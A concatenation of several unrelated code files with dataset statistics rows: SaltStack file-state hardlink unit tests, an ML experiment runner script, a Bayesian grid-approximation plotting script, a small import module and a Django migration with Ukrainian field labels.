), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.object(
os.path, "exists", mock_f
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Target {} for hard link does not exist".format(target)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Test option -- target is a directory
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Unable to hard link from directory {}".format(test_dir)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, test_dir, user=user, group=group) == ret
# Test option -- name is a directory
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Unable to hard link to directory {}".format(test_dir)
ret = return_val(comment=expected, name=test_dir)
assert filestate.hardlink(test_dir, target, user=user, group=group) == ret
# Test option -- name does not exist
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Hard link {} to {} is set for creation".format(name, target)
changes = dict(new=name)
ret = return_val(result=None, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Test option -- hardlink matches
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_stats}
), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "The hard link {} is presently targetting {}".format(name, target)
ret = return_val(result=True, comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Test option -- hardlink does not match
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = "Link {} target is set to be changed to {}".format(name, target)
changes = dict(change=name)
ret = return_val(result=None, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Test option -- force removal
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = (
"The file or directory {} is set for removal to "
"make way for a new hard link targeting {}".format(name, target)
)
ret = return_val(result=None, comment=expected, name=name)
assert (
filestate.hardlink(name, target, force=True, user=user, group=group) == ret
)
# Test option -- without force removal
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.object(
os.path, "exists", mock_t
), patch.dict(
filestate.__opts__, {"test": True}
):
expected = (
"File or directory exists where the hard link {} "
"should be. Did you mean to use force?".format(name)
)
ret = return_val(result=False, comment=expected, name=name)
assert (
filestate.hardlink(name, target, force=False, user=user, group=group) == ret
)
# Target is a directory
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}):
expected = "Unable to hard link from directory {}".format(test_dir)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, test_dir, user=user, group=group) == ret
# Name is a directory
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}):
expected = "Unable to hard link to directory {}".format(test_dir)
ret = return_val(comment=expected, name=test_dir)
assert filestate.hardlink(test_dir, target, user=user, group=group) == ret
# Try overwrite file with link
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.object(
os.path, "isfile", mock_t
):
expected = "File exists where the hard link {} should be".format(name)
ret = return_val(comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Try overwrite link with same
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_stats}
), patch.object(
os.path, "isfile", mock_f
):
expected = "Target of hard link {} is already pointing to {}".format(
name, target
)
ret = return_val(result=True, comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Really overwrite link with same
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.link": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
expected = "Set target of hard link {} -> {}".format(name, target)
changes = dict(new=name)
ret = return_val(result=True, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Fail at overwriting link with same
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_t}
), patch.dict(
filestate.__salt__, {"file.link": mock_execerror}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
expected = "Unable to set target of hard link {} -> {}: {}".format(
name, target, ""
)
ret = return_val(result=False, comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Make new link
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_f}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
expected = "Created new hard link {} -> {}".format(name, target)
changes = dict(new=name)
ret = return_val(result=True, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Fail while making new link
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_execerror}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
expected = "Unable to create new hard link {} -> {}: {}".format(
name, target, ""
)
ret = return_val(result=False, comment=expected, name=name)
assert filestate.hardlink(name, target, user=user, group=group) == ret
# Force making new link over file
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_t}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_t
):
expected = "Created new hard link {} -> {}".format(name, target)
changes = dict(new=name)
changes["forced"] = "File for hard link was forcibly replaced"
ret = return_val(result=True, comment=expected, name=name, changes=changes)
assert (
filestate.hardlink(name, target, user=user, force=True, group=group) == ret
)
# Force making new link over file but error out
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_execerror}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_t
):
expected = "Unable to create new hard link {} -> {}: {}".format(
name, target, ""
)
changes = dict(forced="File for hard link was forcibly replaced")
ret = return_val(result=False, comment=expected, name=name, changes=changes)
assert (
filestate.hardlink(name, target, user=user, force=True, group=group) == ret
)
patches = {}
patches["file.user_to_uid"] = mock_empty
patches["file.group_to_gid"] = mock_empty
patches["file.is_hardlink"] = mock_t
patches["file.stats"] = mock_empty
# Make new link when group is None and file.gid_to_group is unavailable
with patch.dict(filestate.__salt__, patches), patch.dict(
filestate.__salt__, {"file.user_to_uid": mock_uid}
), patch.dict(filestate.__salt__, {"file.group_to_gid": mock_gid}), patch.dict(
filestate.__salt__, {"file.is_hardlink": mock_f}
), patch.dict(
filestate.__salt__, {"file.link": mock_f}
), patch.dict(
filestate.__salt__, {"file.stats": mock_nothing}
), patch.object(
os, "remove", mock_t
), patch.object(
os.path, "isfile", mock_f
):
group = None
expected = "Created new hard link {} -> {}".format(name, target)
changes = dict(new=name)
ret = return_val(result=True, comment=expected, name=name, changes=changes)
assert filestate.hardlink(name, target, user=user, group=group) == ret
| 41.401806 | 88 | 0.64195 | 2,253 | 18,341 | 4.890368 | 0.082557 | 0.088219 | 0.176439 | 0.199673 | 0.807134 | 0.800871 | 0.794155 | 0.778181 | 0.763387 | 0.751407 | 0 | 0.000632 | 0.22327 | 18,341 | 442 | 89 | 41.495475 | 0.772778 | 0.042964 | 0 | 0.706199 | 0 | 0 | 0.161699 | 0.002284 | 0 | 0 | 0 | 0 | 0.06469 | 1 | 0.008086 | false | 0 | 0.043127 | 0.002695 | 0.056604 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
6e273995246879ca219b947ce00249581f3fab1b | 5,679 | py | Python | run.py | bentrevett/CodeSearchNet | d79d0fde2569e4ed7ab0454e3b019fba3d6c7b90 | [
"MIT"
] | 4 | 2019-11-22T16:17:43.000Z | 2020-04-30T07:42:16.000Z | run.py | bentrevett/CodeSearchNet | d79d0fde2569e4ed7ab0454e3b019fba3d6c7b90 | [
"MIT"
] | 1 | 2019-12-13T13:20:01.000Z | 2019-12-15T07:20:38.000Z | run.py | bentrevett/CodeSearchNet | d79d0fde2569e4ed7ab0454e3b019fba3d6c7b90 | [
"MIT"
] | 3 | 2019-11-05T23:30:48.000Z | 2019-12-14T05:55:51.000Z | import subprocess
import os
"""seeds = [2,3,4,5]
for seed in seeds:
command = f'python main2.py --lang java --model transformer --bpe_pct 0.5 --batch_size 450 --hid_dim 512 --n_layers 3 --lr 0.0005 --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""lrs = [0.00075, 0.0005, 0.00025, 0.0001]
seeds = [1,1,1,1]
for lr, seed in zip(lrs, seeds):
command = f'python sequence_lm.py --lang java --model bow --data code --save_model --lr {lr} --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait() """
"""seeds = [1,2,3,4,5]
for seed in seeds:
command = f'python sequence_lm.py --lang java --model transformer --save_model --data code --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""seeds = [2,3,4,5]
for seed in seeds:
command = f'python main2.py --lang java --model transformer --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed {seed} --load'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python sequence_lm.py --lang java --model transformer --save_model --data desc --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python sequence_lm.py --lang 6L-java --model transformer --save_model --data code --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python sequence_lm.py --lang 6L-java --model transformer --save_model --data desc --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python main2.py --lang java --model transformer --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1 --load'
process = subprocess.Popen(command, shell=True)
process.wait()"""
"""command = f'python main2.py --lang 6L-java --model transformer --bpe_pct 0.5 --batch_size 450 --hid_dim 256 --n_layers 3 --lr 0.0005 --seed 1 --load'
process = subprocess.Popen(command, shell=True)
process.wait()"""
seeds = [1,2,3,4,5]
for seed in seeds:
#pre-train
command = f'python main_sequence_lm.py --lang java --n_epochs 5 --data code --model transformer --seed {seed} --save_model'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_sequence_lm.py --lang java --n_epochs 5 --data desc --model transformer --seed {seed} --save_model'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_sequence_lm.py --lang 6L-java --n_epochs 5 --data code --model transformer --seed {seed} --save_model'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_sequence_lm.py --lang 6L-java --n_epochs 5 --data desc --model transformer --seed {seed} --save_model'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_sequence_lm.py --lang 5L-java --n_epochs 5 --data code --model transformer --seed {seed} --save_model'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_sequence_lm.py --lang 5L-java --n_epochs 5 --data desc --model transformer --seed {seed} --save_model'
process = subprocess.Popen(command, shell=True)
process.wait()
#random init
command = f'python main_code_retrieval.py --lang java --model transformer --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_code_retrieval.py --lang 6L-java --model transformer --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_code_retrieval.py --lang 5L-java --model transformer --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_method_prediction.py --lang java --model transformer --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_method_prediction.py --lang 6L-java --model transformer --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_method_prediction.py --lang 5L-java --model transformer --seed {seed}'
process = subprocess.Popen(command, shell=True)
process.wait()
#fine tune
command = f'python main_code_retrieval.py --lang java --model transformer --seed {seed} --load'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_code_retrieval.py --lang 6L-java --model transformer --seed {seed} --load'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_code_retrieval.py --lang 5L-java --model transformer --seed {seed} --load'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_method_prediction.py --lang java --model transformer --seed {seed} --load'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_method_prediction.py --lang 6L-java --model transformer --seed {seed} --load'
process = subprocess.Popen(command, shell=True)
process.wait()
command = f'python main_method_prediction.py --lang 5L-java --model transformer --seed {seed} --load'
process = subprocess.Popen(command, shell=True)
process.wait() | 42.699248 | 179 | 0.690086 | 839 | 5,679 | 4.563766 | 0.078665 | 0.056412 | 0.09872 | 0.204492 | 0.966571 | 0.966571 | 0.966049 | 0.966049 | 0.966049 | 0.966049 | 0 | 0.038961 | 0.159359 | 5,679 | 133 | 180 | 42.699248 | 0.763092 | 0.005107 | 0 | 0.62069 | 0 | 0.103448 | 0.489796 | 0.083407 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034483 | 0 | 0.034483 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e380bf5410a99308efa07c33b512198c670f6e2 | 88 | py | Python | rltk/io/__init__.py | ckxz105/rltk | 2d08269002c00c0218421c8c2dc0cc7c4f677131 | [
"MIT"
] | 98 | 2017-03-07T22:59:41.000Z | 2022-02-02T16:10:40.000Z | rltk/io/__init__.py | ckxz105/rltk | 2d08269002c00c0218421c8c2dc0cc7c4f677131 | [
"MIT"
] | 26 | 2017-04-25T17:25:22.000Z | 2021-09-10T16:57:05.000Z | rltk/io/__init__.py | ckxz105/rltk | 2d08269002c00c0218421c8c2dc0cc7c4f677131 | [
"MIT"
] | 31 | 2017-03-09T22:40:40.000Z | 2022-03-11T16:28:23.000Z | from rltk.io.reader import *
from rltk.io.writer import *
from rltk.io.adapter import *
| 22 | 29 | 0.761364 | 15 | 88 | 4.466667 | 0.466667 | 0.358209 | 0.447761 | 0.477612 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136364 | 88 | 3 | 30 | 29.333333 | 0.881579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
6e471175c6aeb912f23f949446f994f45366671b | 2,008 | py | Python | ch2/2m2.py | xSakix/bayesian_analyses | 14042e193507bae6d69caeb4035ac45ef9044176 | [
"Apache-2.0"
] | null | null | null | ch2/2m2.py | xSakix/bayesian_analyses | 14042e193507bae6d69caeb4035ac45ef9044176 | [
"Apache-2.0"
] | null | null | null | ch2/2m2.py | xSakix/bayesian_analyses | 14042e193507bae6d69caeb4035ac45ef9044176 | [
"Apache-2.0"
] | null | null | null | import grid_approx
import matplotlib.pyplot as plt
import numpy as np
def make_priors(size):
priors = np.random.uniform(0., 1., size)
priors[priors < 0.5] = 0.
priors[priors >= 0.5] = 1.
if priors.sum() == 0.:
return make_priors(size)
return priors.sort()
print(make_priors(10))
# for W
# 1
p_grid, posterior = grid_approx.compute(['W', 'W', 'W'], priors=make_priors(3))
plt.plot(p_grid, posterior, label='#1')
# 2
p_grid, posterior = grid_approx.compute(['W', 'W', 'W', 'L'], priors=make_priors(4))
plt.plot(p_grid, posterior, label='#2')
# 3
p_grid, posterior = grid_approx.compute(['L', 'W', 'W', 'L', 'W', 'W', 'W'], priors=make_priors(7))
plt.plot(p_grid, posterior, label='#3')
plt.xlabel('probability of W')
plt.ylabel('plausibility')
plt.legend()
plt.show()
plt.clf()
# for L
# 1
p_grid, posterior = grid_approx.compute(['W', 'W', 'W'], 'L', priors=make_priors(3))
plt.plot(p_grid, posterior, label='#1')
# 2
p_grid, posterior = grid_approx.compute(['W', 'W', 'W', 'L'], 'L', priors=make_priors(4))
plt.plot(p_grid, posterior, label='#2')
# 3
p_grid, posterior = grid_approx.compute(['L', 'W', 'W', 'L', 'W', 'W', 'W'], 'L', priors=make_priors(7))
plt.plot(p_grid, posterior, label='#3')
plt.xlabel('probability of L')
plt.ylabel('plausibility')
plt.legend()
plt.show()
# 4
for j in range(4):
obs = ['L', 'W', 'W', 'L', 'W', 'W', 'W']
for i in range(j * 10):
obs.append(obs)
p_grid, posterior = grid_approx.compute(obs, priors=make_priors(len(obs)))
plt.plot(p_grid, posterior, label='#' + str(len(obs)))
plt.xlabel('probability of W')
plt.ylabel('plausibility')
plt.legend()
plt.show()
# 4L
for j in range(4):
obs = ['L', 'W', 'W', 'L', 'W', 'W', 'W']
for i in range(j * 10):
obs.append(obs)
p_grid, posterior = grid_approx.compute(obs, 'L', priors=make_priors(len(obs)))
plt.plot(p_grid, posterior, label='#' + str(len(obs)))
plt.xlabel('probability of L')
plt.ylabel('plausibility')
plt.legend()
plt.show()
| 26.077922 | 104 | 0.625498 | 330 | 2,008 | 3.69697 | 0.160606 | 0.032787 | 0.183607 | 0.118033 | 0.82377 | 0.82377 | 0.82377 | 0.822951 | 0.822951 | 0.822951 | 0 | 0.021752 | 0.152888 | 2,008 | 76 | 105 | 26.421053 | 0.695473 | 0.013944 | 0 | 0.615385 | 0 | 0 | 0.087354 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019231 | false | 0 | 0.057692 | 0 | 0.115385 | 0.019231 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
28401076908ecc31b4783e099ddd1cbe624f0b97 | 6,822 | py | Python | pepdb/core/migrations/0088_auto_20160509_0247.py | dchaplinsky/pep.org.ua | 8633a65fb657d7f04dbdb12eb8ae705fa6be67e3 | [
"MIT"
] | 7 | 2015-12-21T03:52:46.000Z | 2020-07-24T19:17:23.000Z | pepdb/core/migrations/0088_auto_20160509_0247.py | dchaplinsky/pep.org.ua | 8633a65fb657d7f04dbdb12eb8ae705fa6be67e3 | [
"MIT"
] | 12 | 2016-03-05T18:11:05.000Z | 2021-06-17T20:20:03.000Z | pepdb/core/migrations/0088_auto_20160509_0247.py | dchaplinsky/pep.org.ua | 8633a65fb657d7f04dbdb12eb8ae705fa6be67e3 | [
"MIT"
] | 4 | 2016-07-17T20:19:38.000Z | 2021-03-23T12:47:20.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import redactor.fields
class Migration(migrations.Migration):
dependencies = [
('core', '0087_auto_20160419_0250'),
]
operations = [
migrations.CreateModel(
name='DeclarationExtra',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('date_confirmed', models.DateField(db_index=True, null=True, verbose_name='\u0414\u0430\u0442\u0430', blank=True)),
('date_confirmed_details', models.IntegerField(default=0, verbose_name='\u0442\u043e\u0447\u043d\u0456\u0441\u0442\u044c', choices=[(0, '\u0422\u043e\u0447\u043d\u0430 \u0434\u0430\u0442\u0430'), (1, '\u0420\u0456\u043a \u0442\u0430 \u043c\u0456\u0441\u044f\u0446\u044c'), (2, '\u0422\u0456\u043b\u044c\u043a\u0438 \u0440\u0456\u043a')])),
('section', models.IntegerField(default=0, db_index=True, verbose_name='\u0420\u043e\u0437\u0434\u0456\u043b \u0434\u0435\u043a\u043b\u0430\u0440\u0430\u0446\u0456\u0457', choices=[(0, '\u0417\u0430\u0433\u0430\u043b\u044c\u043d\u0430 \u0441\u0443\u043c\u0430 \u0441\u0443\u043a\u0443\u043f\u043d\u043e\u0433\u043e \u0434\u043e\u0445\u043e\u0434\u0443, \u0433\u0440\u0438\u0432\u043d\u0456'), (1, '\u0414\u0430\u0440\u0443\u043d\u043a\u0438, \u043f\u0440\u0438\u0437\u0438, \u0432\u0438\u0433\u0440\u0430\u0448\u0456'), (2, '\u0417\u0435\u043c\u0435\u043b\u044c\u043d\u0456 \u0434\u0456\u043b\u044f\u043d\u043a\u0438'), (3, '\u0416\u0438\u0442\u043b\u043e\u0432\u0456 \u0431\u0443\u0434\u0438\u043d\u043a\u0438'), (4, '\u041a\u0432\u0430\u0440\u0442\u0438\u0440\u0438'), (5, '\u0406\u043d\u0448\u0435 \u043d\u0435\u0440\u0443\u0445\u043e\u043c\u0435 \u043c\u0430\u0439\u043d\u043e'), (6, '\u0422\u0440\u0430\u043d\u0441\u043f\u043e\u0440\u0442\u043d\u0456 \u0437\u0430\u0441\u043e\u0431\u0438'), (7, '\u0412\u043a\u043b\u0430\u0434\u0438 \u0443 \u0431\u0430\u043d\u043a\u0430\u0445'), (8, '\u0424\u0456\u043d\u0430\u043d\u0441\u043e\u0432\u0456 \u0437\u043e\u0431\u043e\u0432\u2019\u044f\u0437\u0430\u043d\u043d\u044f'), (9, '\u0406\u043d\u0448\u0456 \u0430\u043a\u0442\u0438\u0432\u0438')])),
('note', redactor.fields.RedactorField(verbose_name='\u0422\u0435\u043a\u0441\u0442')),
('address', redactor.fields.RedactorField(verbose_name='\u0410\u0434\u0440\u0435\u0441\u0430', blank=True)),
('country', models.ForeignKey(to='core.Country', blank=True)),
('person', models.ForeignKey(to='core.Person')),
],
options={
'verbose_name': '\u0414\u043e\u0434\u0430\u0442\u043a\u043e\u0432\u0430 \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u044f \u043f\u0440\u043e \u0441\u0442\u0430\u0442\u043a\u0438',
'verbose_name_plural': '\u0414\u043e\u0434\u0430\u0442\u043a\u043e\u0432\u0430 \u0456\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0456\u044f \u043f\u0440\u043e \u0441\u0442\u0430\u0442\u043a\u0438',
},
),
migrations.AlterField(
model_name='company2company',
name='relationship_type',
field=models.CharField(blank=True, max_length=30, verbose_name="\u0422\u0438\u043f \u0437\u0432'\u044f\u0437\u043a\u0443", choices=[('\u0412\u043b\u0430\u0441\u043d\u0438\u043a', '\u0412\u043b\u0430\u0441\u043d\u0438\u043a'), ('\u0421\u043f\u0456\u0432\u0432\u043b\u0430\u0441\u043d\u0438\u043a', '\u0421\u043f\u0456\u0432\u0432\u043b\u0430\u0441\u043d\u0438\u043a'), ('\u0421\u043f\u043e\u0440\u0456\u0434\u043d\u0435\u043d\u0430', '\u0421\u043f\u043e\u0440\u0456\u0434\u043d\u0435\u043d\u0430'), ('\u0417\u0430\u0441\u043d\u043e\u0432\u043d\u0438\u043a', '\u0417\u0430\u0441\u043d\u043e\u0432\u043d\u0438\u043a'), ('\u0421\u043f\u0456\u0432\u0437\u0430\u0441\u043d\u043e\u0432\u043d\u0438\u043a', '\u0421\u043f\u0456\u0432\u0437\u0430\u0441\u043d\u043e\u0432\u043d\u0438\u043a'), ('\u041a\u0440\u0435\u0434\u0438\u0442\u043e\u0440 (\u0444\u0456\u043d\u0430\u043d\u0441\u043e\u0432\u0438\u0439 \u043f\u0430\u0440\u0442\u043d\u0435\u0440)', '\u041a\u0440\u0435\u0434\u0438\u0442\u043e\u0440 (\u0444\u0456\u043d\u0430\u043d\u0441\u043e\u0432\u0438\u0439 \u043f\u0430\u0440\u0442\u043d\u0435\u0440)'), ('\u041d\u0430\u0434\u0430\u0432\u0430\u0447 \u043f\u0440\u043e\u0444\u0435\u0441\u0456\u0439\u043d\u0438\u0445 \u043f\u043e\u0441\u043b\u0443\u0433', '\u041d\u0430\u0434\u0430\u0432\u0430\u0447 \u043f\u0440\u043e\u0444\u0435\u0441\u0456\u0439\u043d\u0438\u0445 \u043f\u043e\u0441\u043b\u0443\u0433'), ('\u041a\u043b\u0456\u0454\u043d\u0442', '\u041a\u043b\u0456\u0454\u043d\u0442'), ('\u0412\u0438\u043a\u043e\u043d\u0430\u0432\u0435\u0446\u044c', '\u0412\u0438\u043a\u043e\u043d\u0430\u0432\u0435\u0446\u044c'), ('\u0417\u0430\u043c\u043e\u0432\u043d\u0438\u043a', '\u0417\u0430\u043c\u043e\u0432\u043d\u0438\u043a'), ('\u041f\u0456\u0434\u0440\u044f\u0434\u043d\u0438\u043a', '\u041f\u0456\u0434\u0440\u044f\u0434\u043d\u0438\u043a'), ('\u0421\u0443\u0431\u043f\u0456\u0434\u0440\u044f\u0434\u043d\u0438\u043a', '\u0421\u0443\u0431\u043f\u0456\u0434\u0440\u044f\u0434\u043d\u0438\u043a'), ('\u041f\u043e\u0441\u0442\u0430\u0447\u0430\u043b\u044c\u043d\u0438\u043a', '\u041f\u043e\u0441\u0442\u0430\u0447\u0430\u043b\u044c\u043d\u0438\u043a'), ('\u041e\u0440\u0435\u043d\u0434\u0430\u0440', '\u041e\u0440\u0435\u043d\u0434\u0430\u0440'), ('\u041e\u0440\u0435\u043d\u0434\u043e\u0434\u0430\u0432\u0435\u0446\u044c', '\u041e\u0440\u0435\u043d\u0434\u043e\u0434\u0430\u0432\u0435\u0446\u044c'), ('\u041a\u043e\u043d\u0442\u0440\u0430\u0433\u0435\u043d\u0442', '\u041a\u043e\u043d\u0442\u0440\u0430\u0433\u0435\u043d\u0442'), ('\u041f\u0440\u0430\u0432\u043e\u043d\u0430\u0441\u0442\u0443\u043f\u043d\u0438\u043a', '\u041f\u0440\u0430\u0432\u043e\u043d\u0430\u0441\u0442\u0443\u043f\u043d\u0438\u043a'), 